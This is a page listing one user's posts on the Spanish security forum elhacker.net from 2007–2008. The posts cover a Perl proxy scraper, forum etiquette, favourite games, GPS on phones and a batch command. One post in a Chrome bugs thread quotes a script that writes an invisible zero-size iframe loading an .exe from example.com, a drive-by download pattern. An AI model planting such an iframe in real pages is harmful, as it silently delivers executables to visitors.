elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 ... 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 [121] 122
1201  Programación / Scripting / Re: Extractor de Proxy Desde http://www.proxy-list.net/ en: 28 Octubre 2008, 18:38 pm
Can't locate object method "Default header" via package "LWP::Useragent".
La verdad revise el code una y otra vez y sigo sin encontrar el error :/, estoy algo oxidado en perl pero no tanto.


Edit: Lo que estaba oxidado era la version del Active  :xD ;D, pero aunque ahora funciona los .txt me los crea vacios.
1202  Foros Generales / Sugerencias y dudas sobre el Foro / Re: ¿Se busca vender noticia? (Neutralidad en Noticias) en: 28 Octubre 2008, 05:34 am
Excelente idea, abundan los titulos fanaticos y tendenciosos. Ojala la aprueben los jefes.
1203  Media / Juegos y Consolas / Re: Tu mejor juego, y por qué xDDD. en: 28 Octubre 2008, 01:49 am
GTA San Andreas (PC): El GTA que mas disfrute, la historia, los detalles, la personalizacion, la verdad ese juego es un lujo y hasta ahora solo puede ser superado por otro GTA.

Principe de Persia 1,2,3 (PC): La jugabilidad es buenisima, asi como la accion y los desafios.

Final Fantasy VIII (PS1): Una de las mejores historias de los FF mas esos graficos increibles para la epoca, ya habiendo roto los esquemas con el FF VII con el VIII se fueron a la *****
1204  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Normas de convivencia pacífica y mínimos modales a observar - Comentario en: 9 Octubre 2008, 19:59 pm
Para mi que rando a veces entra al foro en vez de navegando, volando XDD y su contraseña debe de ser "maria juana" XD


JAJAJAJ, yo percibo lo mismo  :xD :xD
1205  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Normas de convivencia pacífica y mínimos modales a observar - Comentario en: 9 Octubre 2008, 19:49 pm
Artik una vez dijo que Rando es caotico para responder (yo no le habia entendido ni media de lo que rando habia puesto, por eso el comentario de Artik) y muuuy muy acido, hay que tomarselo en broma que estamos para aprender y divertirnos, no para pelearnos entre nosotros.
1206  Media / Juegos y Consolas / Re: Flight simulator X, en: 2 Octubre 2008, 07:35 am
Tanta placaa para usar el Flight simulator? :o Se pasaron
1207  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Post de inconformidad con la gente del foro. en: 30 Septiembre 2008, 05:15 am
Seguro que el 90% de los que estamos aquí NUNCA hemos leido ni el 50% de las reglas... ¿quienes de aquí se han aprendido todas las reglas?  :rolleyes:

Con un poquito de sentido común, no preguntar cosas del estilo 'como hackear hotmail', buscar bien antes de preguntar, no hacer spam y respetar a todos los usuarios es suficiente para que no te baneen... no necesitas aprenderte las mas de 50 o 100 (no me acuerdo cuantas eran) reglas que hay en el foro...

¿alguien se ha leido todos los articulos de la constitución de su pais? :) yo no, y ni me han baneado del foro ni me han metido en la cárcel, y sí, cuando entré a este foro por primera vez fuí un lammer tambien, de hecho, aquí muchisimos de los que estamos ahora llamando lammers a otros hemos sido de los tipicos que hemos preguntado por lo del hackeo de hotmail en tiempos pasados... :)




Mas razon no podias tener. Algunos juzgan como si hubiesen nacido sabiendo  ;)
1208  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 5 Septiembre 2008, 05:38 am
A mi la verdad que no me entra todavia en la cabeza como pudieron encontrar un bug como este  :-X :-\

Código:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

Es increible que a Google se le haya pasado algo asi. Esa mania de sacar betas/alpha sin ningun minimo testeo.



pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P
1209  Seguridad Informática / Materiales y equipos / Re: GPS en: 14 Marzo 2008, 16:28 pm
Por IRDA creo que no se puede. Por bluetooth hay softwares que pueden utilizar un receptor externo gps conectado al movil. En cuanto al N95 tiene un receptor interno por ende acorde al pais hay distintas maneras (Por ej en ARG: Garmin y mapear)

Saludos
1210  Programación / Scripting / Re: Codigo-Batch en: 20 Agosto 2007, 23:28 pm
No es mejor con esto? :

Código:
msg %username% y aca el mensaje?
Páginas: 1 ... 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 [121] 122
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines